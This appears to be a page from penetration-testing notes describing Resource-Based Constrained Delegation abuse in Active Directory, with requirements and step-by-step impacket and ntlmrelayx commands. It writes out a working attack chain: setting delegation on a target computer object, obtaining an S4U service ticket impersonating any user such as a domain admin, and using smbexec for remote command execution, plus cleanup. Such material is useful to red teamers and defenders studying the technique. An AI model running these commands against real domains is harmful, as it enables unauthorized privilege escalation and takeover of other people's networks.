Resource-Based Constrained Delegation (RBCD)¶

Set msDS-AllowedToActOnBehalfOfOtherIdentity on the target service’s AD object (DC$, etc.) to include an SPN-bearing principal you control (MACHINE$); with write access, you can obtain Kerberos service tickets as arbitrary users to any SPN registered on that target account.

Requirements¶

Machine account credentials
- Can be obtained by creating one. See AD User Account With MachineAccountQuota > 0
An account or relayed LDAP/LDAPS session with WriteDACL/GenericWrite on the TARGET$ computer object
- Can be a user or MACHINE$ account. MACHINE$ have write access on themselves.
- The impersonated account must be delegable, not “Protected Users" group. Cannot be marked as "Account is sensitive and cannot be delegated"
Domain Controller running on Windows Server 2012+. msDS-AllowedToActOnBehalfOfOtherIdentity did not exist before 2012.

Exploitation¶

ATTACKER$ = Attacker controlled machine

TARGET$ = Machine to gain access to

1. Set RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) Privileges on target¶

impacket

rbcd.py -action write -delegate-to '<TARGET$>' -delegate-from '<ATTACKER$>' -use-ldaps -dc-ip <dc_ip> <domain>/<user>:'<pass>'

If channel binding/signing is enforced, add the flag -use-ldaps.

OR

ntlmrelayx LDAP shell

set_rbcd <TARGET$> <ATTACKER$>

If channel binding/signing is enforced, issue start_tls inside the LDAP shell before set_rbcd.

Verify - troubleshooting, etc.¶

Verify delegation access using impacket

rbcd.py -action read -delegate-to '<TARGET$>' -dc-ip <dc_ip> <domain>/<user>:'<pass>'

2. Obtain TGT and access $TARGET¶

Obtain TGT for ATTACKER$

getTGT.py <domain>/<ATTACKER$>:'<comp_pass>' -dc-ip <dc_ip>

Output: <ATTACKER$>.ccache

Generate service ticket / S4U to SPN

KRB5CCNAME=<ATTACKER$>.ccache getST.py -spn <SPN_TYPE>/<TARGET_FQDN> -impersonate <USER_TO_IMPERSONATE> <DOMAIN>/<ATTACKER$> -k -no-pass -dc-ip <DC_IP>

- Output: <USER_TO_IMPERSONATE>.ccache

USER_TO_IMPERSONATE can be any user you want. Pick something that makes sense (i.e. A domain admin should have admin access to DC's LDAP)

Choose which SPN_TYPE based on which service you want to authenticate to.

See Remote Command Execution Tools to see which tools work for each service/SPN type.

FQDN of target is required (not ip address) when using -k so SPN resolution works correctly.

3. Use the ticket¶

Accessing the targeted SPN as the impersonated user

KRB5CCNAME=<USER_TO_IMPERSONATE>.ccache smbexec.py -k -no-pass <DOMAIN>/<USER_TO_IMPERSONATE>@<TARGET_FQDN>

Use the ccache with whichever service / tool is associated with the previously chosen SPN.

Remote Command Execution Tools

4. Cleanup - After finished generating tickets.¶

Remove RBCD access from the ATTACKER$ machine.

rbcd.py -action remove -delegate-to '<TARGET$>' -delegate-from '<ATTACKER$>' -dc-ip <dc_ip> <domain>/<user>:'<pass>'